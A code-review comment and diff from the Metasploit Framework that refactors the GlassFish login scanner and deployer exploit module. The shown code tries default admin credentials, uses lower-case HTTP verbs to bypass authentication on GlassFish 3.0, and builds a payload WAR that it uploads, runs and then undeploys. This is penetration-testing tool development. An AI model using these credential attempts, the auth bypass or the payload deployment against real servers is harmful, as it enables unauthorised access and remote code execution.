This looks good so far

Author: wchen-r7

lib/metasploit/framework/login_scanner/glassfish.rb

@@ -14,7 +14,7 @@ class Glassfish < HTTP
 
         # @!attribute [r] version
         #   @return [String] Glassfish version
-        attr_reader :version
+        attr_accessor :version
 
         # @!attribute jsession
         #   @return [String] Cookie session

modules/exploits/multi/http/glassfish_deployer.rb

@@ -86,7 +86,7 @@ def send_glassfish_request(path, method, session='', data=nil, ctype=nil)
   def auto_target(session, res, version)
     print_status("Attempting to automatically select a target...")
 
-    res = query_serverinfo(session,version)
+    res = query_serverinfo(session, version)
     return nil unless res
     return nil unless res.body
 
@@ -601,7 +601,7 @@ def upload_exec(opts = {})
       print_status("Error: #{rhost} did not respond on #{app_rport}.")
     end
 
-    #Sleep for a bit before cleanup
+    # Sleep for a bit before cleanup
     select(nil, nil, nil, 5)
 
     #Start undeploying
@@ -619,10 +619,8 @@ def upload_exec(opts = {})
     print_status("Undeployment complete.")
   end
 
-  def init_loginscanner(creds)
-    @cred_collection = Metasploit::Framework::CredentialCollection.new(
-      userpass_file: creds * "\n"
-    )
+  def init_loginscanner
+    @cred_collection = Metasploit::Framework::CredentialCollection.new
 
     @scanner = Metasploit::Framework::LoginScanner::Glassfish.new(
       configure_http_login_scanner(
@@ -654,30 +652,44 @@ def try_glassfish_auth_bypass(version)
   end
 
   def my_target_host
-    path = normalize_uri(datastore['PATH'])
-    my_target_host = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"
+    my_target_host = "http://#{rhost.to_s}:#{rport.to_s}#{normalize_uri(datastore['PATH'])}"
   end
 
   def try_normal_login(version)
+    init_loginscanner
+
     case version
     when /2\.x|9\.x/
-      creds = ['admin adminadmin']
+      @cred_collection.prepend_cred(
+        Metasploit::Framework::Credential.new(
+        public: 'admin',
+        private: 'adminadmin',
+        private_type: :password
+      ))
     when /^3\./
-      creds = ['admin']
-    else
-      creds = []
+      @cred_collection.prepend_cred(
+        Metasploit::Framework::Credential.new(
+        public: 'admin',
+        private: '',
+        private_type: :password
+      ))
     end
 
-    creds << "#{datastore['USERNAME']} #{datastore['PASSWORD']}"
-
-    init_loginscanner(creds)
+    @cred_collection.prepend_cred(
+      Metasploit::Framework::Credential.new(
+      public: datastore['USERNAME'],
+      private: datastore['PASSWORD'],
+      private_type: :password
+    ))
 
+    @scanner.send_request({'uri'=>'/'})
     @scanner.version = version
     @cred_collection.each do |raw|
       cred = raw.to_credential
+      print_status("Trying to login as #{cred.public}:#{cred.private}")
       result = @scanner.attempt_login(cred)
-      if result == Metasploit::Model::Login::Status::SUCCESSFUL
-        return @scanner.:jsession
+      if result.status == Metasploit::Model::Login::Status::SUCCESSFUL
+        return @scanner.jsession
       end
     end
 
@@ -692,24 +704,20 @@ def attempt_login(version)
       return sid if sid
     end
 
-    try_normal_login(version, user, pass, 'non-default')
+    try_normal_login(version)
   end
 
-  def make_war
-    my_target = auto_target(sid, res, version) if target.name =~ /Automatic/
-    fail_with(Failure::NoTarget, "Unable to automatically select a target") unless mytarget
-
-    # Generate payload
-    p = exploit_regenerate_payload(mytarget.platform, mytarget.arch)
+  def make_war(selected_target)
+    p = exploit_regenerate_payload(selected_target.platform, selected_target.arch)
 
     jsp_name = rand_text_alphanumeric(4+rand(32-4))
     app_base = rand_text_alphanumeric(4+rand(32-4))
 
     war = p.encoded_war({
       :app_name    => app_base,
       :jsp_name    => jsp_name,
-      :arch        => mytarget.arch,
-      :platform    => mytarget.platform
+      :arch        => selected_target.arch,
+      :platform    => selected_target.platform
     }).to_s
 
     return app_base, jsp_name, war
@@ -729,8 +737,8 @@ def exploit
 
     # Set HTTP verbs. Lower-case is used to bypass auth on v3.0
     @verbs = {
-      'GET'  => (version == '3.0' || version == '2.x' || version || '9.x') ? "get" : 'GET',
-      'POST' => (version == '3.0' || version == '2.x' || version || '9.x') ? 'post' : 'POST',
+      'GET'  => (version == '3.0' || version == '2.x' || version == '9.x') ? 'get' : 'GET',
+      'POST' => (version == '3.0' || version == '2.x' || version == '9.x') ? 'post' : 'POST',
     }
 
     sid = attempt_login(version)
@@ -739,7 +747,10 @@ def exploit
       fail_with(Failure::NoAccess, "#{my_target_host()} - GlassFish - Failed to authenticate login")
     end
 
-    app_base, jsp_name, war = make_war
+    selected_target = target.name =~ /Automatic/ ? auto_target(sid, res, version) : target
+    fail_with(Failure::NoTarget, "Unable to automatically select a target") unless selected_target
+
+    app_base, jsp_name, war = make_war(selected_target)
     print_status("Uploading payload...")
     res = upload_exec({
       :session => sid,